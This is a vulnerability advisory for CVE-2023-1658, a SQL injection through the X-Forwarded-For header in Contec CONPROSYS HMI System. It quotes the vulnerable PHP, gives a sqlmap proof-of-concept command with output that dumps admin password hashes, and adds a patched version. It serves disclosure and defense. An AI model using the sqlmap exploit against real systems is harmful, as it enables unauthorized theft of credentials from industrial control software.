CVE-2023-1658

critical

Description

There is an SQL injection vulnerability in Contec CONPROSYS HMI System (CHS) 3.5.1. An unauthenticated remote attacker can exploit it to enumerate a CHS database.

CHS logs login attempts to the dbo.m_user_login table in a PostgreSQL database. From auth_login.php:

    $v = d5::v(); // get client IP address
    if ($l != null) {
        $p = ad(time());
        $q = new d5($i, null, null, 'dbo.m_user_login');
        try {
            // the column list and the quoted, comma-joined values are passed as plain strings
            $q->_a(_S34_, "'" . $o . "','" . $l->l . "','" . $v . "','" . $p . "',true," . ($b ? 'true' : 'false'));
            // ... (excerpt ends here)

It uses the client IP address to fill in the client_ip column in the m_user_login table. The IP address can be taken from an attacker-controlled X-Forwarded-For header. From CPostgreSQL.php:

    static function v() {
        // the X-Forwarded-For header, if present, takes precedence over the real peer address
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) return $_SERVER['HTTP_X_FORWARDED_FOR'];
        if (isset($_SERVER['REMOTE_ADDR'])) return $_SERVER['REMOTE_ADDR'];
        return '';
    }

The X-Forwarded-For header is not sanitized, allowing SQL injection via a PostgreSQL INSERT statement. From CPostgreSQL.php:

    function _a($a, $e) {
        if ($a == null || $a == '' || $e == null || $e == '') {
            $this->a = 'Error: Invalid parameter.';
            return FALSE;
        }
        if ($this->_ == null) {
            if (!$this->k()) return FALSE;
        }
        if ($this->_ == null) {
            $this->a = 'Error: Not connected.';
            return FALSE;
        }
        // the values are already concatenated into the SQL text, so prepare() adds no protection
        $c = 'insert into ' . $this->f . ' (' . $a . ') values (' . $e . ')';
        $_ = FALSE;
        try {
            $d = $this->_->prepare($c);
            $_ = $d->execute();
            // ... (excerpt ends here)

PoC

The following sqlmap command extracts user names and password hashes in the companys.dbo.s_users table:

    sqlmap -u 'http:///php/login.php' --data='uid=admin&pwd=aaaa&cid=admin&pid=admin&type=admin,user&nname=1&lang=en' --headers="X-Forwarded-For:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*" --technique=T --level 5 --risk 3 --ignore-code=401 --dbms=PostgreSQL -p 'X-Forwarded-For' --no-cast --drop-set-cookie --dump -D dbo -T s_users -C login_id,login_password

    [1 entry]
    +----------+-------------------------------------------------------------------+
    | login_id | login_password                                                    |
    +----------+-------------------------------------------------------------------+
    | admin    | :a0edf1520405d98745153ca965fb376e62b662d1ae4316ab4af3402e44b859f5 |
    +----------+-------------------------------------------------------------------+
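As an added example (not CHS code), a hardened version of the login-logging path above written against PDO for PostgreSQL: the X-Forwarded-For value is only honoured when the direct peer is a trusted proxy and only if it parses as an IP address, and the INSERT uses bound parameters so the value travels separately from the SQL text. The column names other than client_ip, the $trustedProxies list and the existing $pdo connection are assumptions.

```php
<?php
// Added example, not part of CHS. Column names other than client_ip and the
// trusted-proxy list are assumptions; $pdo is an existing PDO pgsql connection.

function clientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    // Only honour X-Forwarded-For when the direct peer is one of our own proxies;
    // any client can send the header, so otherwise it is untrusted input.
    if (isset($server['HTTP_X_FORWARDED_FOR']) && in_array($remote, $trustedProxies, true)) {
        // XFF may be a comma-separated chain; the leftmost entry is the original client.
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;
}

function recordLoginAttempt(PDO $pdo, string $loginId, string $clientIp, bool $ok): bool
{
    // Bound parameters: the driver sends values separately from the statement text,
    // so a crafted header cannot change the INSERT the way string concatenation does.
    $stmt = $pdo->prepare(
        'INSERT INTO dbo.m_user_login (login_id, client_ip, login_time, result)
         VALUES (:login_id, :client_ip, :login_time, :result)'
    );
    $stmt->bindValue(':login_id', $loginId, PDO::PARAM_STR);
    $stmt->bindValue(':client_ip', $clientIp, PDO::PARAM_STR);
    $stmt->bindValue(':login_time', date('Y-m-d H:i:s'), PDO::PARAM_STR);
    $stmt->bindValue(':result', $ok, PDO::PARAM_BOOL);
    return $stmt->execute();
}

// Usage (constructed values, not a real deployment):
// $ip = clientIp($_SERVER, ['10.0.0.5']);
// recordLoginAttempt($pdo, $loginId, $ip, $authenticated);
```

With this change a header value containing quotes or SQL keywords is stored (or rejected by the IP check) rather than executed, and the audit row still records which address the proxy reported.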

Details

Source: Mitre, NVD

Published: 2023-03-31

Risk Information

CVSS v2

Base Score: 7.5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Severity: High

CVSS v3

Base Score: 9.8

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Severity: Critical